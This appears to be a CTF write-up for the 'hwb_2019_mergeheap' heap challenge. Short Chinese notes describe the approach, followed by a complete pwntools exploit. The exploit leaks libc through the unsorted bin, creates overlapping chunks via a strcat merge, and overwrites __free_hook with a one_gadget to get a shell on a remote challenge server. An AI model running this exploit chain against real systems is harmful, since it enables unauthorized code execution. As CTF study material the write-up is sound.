hwb_2019_mergeheap
查看保护
利用str的特性遇见\x00会被截断
攻击思路:2.27下泄露libc需要填满7个再释放的时候就是进unsortedbin了。利用strcat将下一个堆块的size都复制过来,形成堆块重叠,然后任意地址写,改hook为one_gadget。
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'


def li(x):
    """Print the string *x* highlighted in orange (ANSI 256-colour 214)."""
    print('\x1b[01;38;5;214m' + x + '\x1b[0m')


def ll(x):
    """Print the string *x* highlighted in red (ANSI colour 1)."""
    print('\x1b[01;38;5;1m' + x + '\x1b[0m')


# NOTE(review): a truthy `debug` selects the *remote* target, which is the
# opposite of the usual meaning of the name; kept as the author wrote it.
debug = 1
r = remote('node4.buuoj.cn', 29472) if debug else process(file_name)
elf = ELF(file_name)
def dbg():
    """Attach gdb to the global tube ``r``.

    Whether ``r`` is a local process or a remote connection is decided by
    the ``debug`` flag above; this helper is only useful in the local case.
    """
    gdb.attach(r)
# Marker each helper below waits for (via sendlineafter) before sending a menu choice.
menu = '>>'
def add(size, content):
    """Menu option 1: create an entry of *size* bytes holding *content*.

    Answers the target's `>>`, `len:` and `content:` prompts over the
    global tube ``r``; returns nothing.
    """
    send = r.sendlineafter
    send(menu, '1')
    send('len:', str(size))
    send('content:', content)
def show(index):
    """Menu option 2: ask the target to print entry *index*.

    The caller reads whatever the target echoes from ``r`` afterwards;
    nothing is returned here.
    """
    choice, idx = '2', str(index)
    r.sendlineafter(menu, choice)
    r.sendlineafter('idx:', idx)
def delete(index):
    """Menu option 3: free entry *index* on the target (no return value)."""
    for prompt, answer in ((menu, '3'), ('idx:', str(index))):
        r.sendlineafter(prompt, answer)
def merge(idx1,idx2):
    """Menu option 4: merge entries *idx1* and *idx2* into a new entry.

    The notes at the top of this page identify this operation's strcat-based
    copy as what produces the chunk overlap the rest of the script depends on.
    """
    steps = [(menu, '4'), ('idx1:', str(idx1)), ('idx2:', str(idx2))]
    for prompt, answer in steps:
        r.sendlineafter(prompt, answer)
# Root cause as stated in the notes above: the merge routine copies with strcat
# and the program's string handling stops at the first \x00, so a NUL-free
# entry lets the copy run into the next chunk's size field (chunk overlap).
# Mitigation-wise, the later stages also depend on a writable __free_hook,
# which glibc removed in 2.34; this chain is specific to the bundled 2.27 libc.

# --- Stage 1: leak a libc address ------------------------------------------
# Allocate eight 0x80-byte entries, then free indices 1..7 before index 0.
# Per the notes above, on 2.27 the first seven frees of one size fill a bin and
# the eighth (index 0) goes to the unsorted bin, leaving libc pointers in it.
for i in range(8):
    add(0x80,'aaaaa')
for i in range(1,8):
    delete(i)
delete(0)
# Re-use that chunk with 8 non-NUL bytes, then show it: presumably the print
# runs until the first \x00 and therefore echoes the libc pointer that follows.
add(0x8,'aaaaaaaa')#0
show(0)
# Take the last 6 bytes up to the 0x7f byte as the leaked address. The
# `- 224 - 0x10` adjustment is the author's constant for this libc build and
# cannot be derived from this file.
malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 224 - 0x10
li('[+] malloc_hook = ' + hex(malloc_hook))
# Resolve libc base from the __malloc_hook symbol of the bundled 2.27 libc and
# derive __free_hook from it; `one` holds the author's one_gadget offsets and
# the second one is used.
libc = ELF('./2.27/libc-2.27.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
one = [0x4f2c5, 0x4f322, 0x10a38c]
one_gadget = one[1] + libc_base

# --- Stage 2: produce overlapping chunks via merge -------------------------
add(0x60, 'aaaa')
# Indices 2 and 3 are filled completely with non-NUL bytes (no terminator),
# which is what the strcat/\x00 note at the top refers to.
add(0x30, 'a'*0x30)#2
add(0x38, 'a'*0x38)#3
add(0x100, 'aaaa')#4
add(0x68, 'aaaa')#5
add(0x20, 'aaaa')#6
add(0x20, 'aaaa')#7
add(0x20, 'aaaa')#8
add(0x20, 'aaaa')#9
# Frees 5, 7, 8 and the merge of 2+3 set up the layout; the resulting heap
# state is not visible from this file — TODO confirm with dbg() if reproducing.
delete(5)
delete(7)
delete(8)
merge(2, 3)
delete(6)

# --- Stage 3: overwrite __free_hook ----------------------------------------
# payload1 places a forged 0x30 size field followed by the __free_hook address
# into the region that now overlaps freed index 6 (presumably — the overlap
# comes from the merge above, per the notes).
payload1 = b'a' * 0x28 +p64(0x30) + p64(free_hook) + p64(0)
add(0x100, payload1)
# Two 0x20 requests consume the entries ahead of the corrupted one; the third
# is the "arbitrary address write" from the notes and stores one_gadget.
add(0x20, 'aaaa')
add(0x20, 'aaaa')
add(0x20, p64(one_gadget))
# Freeing any entry now goes through the overwritten hook; index 9 is unused.
delete(9)
r.interactive()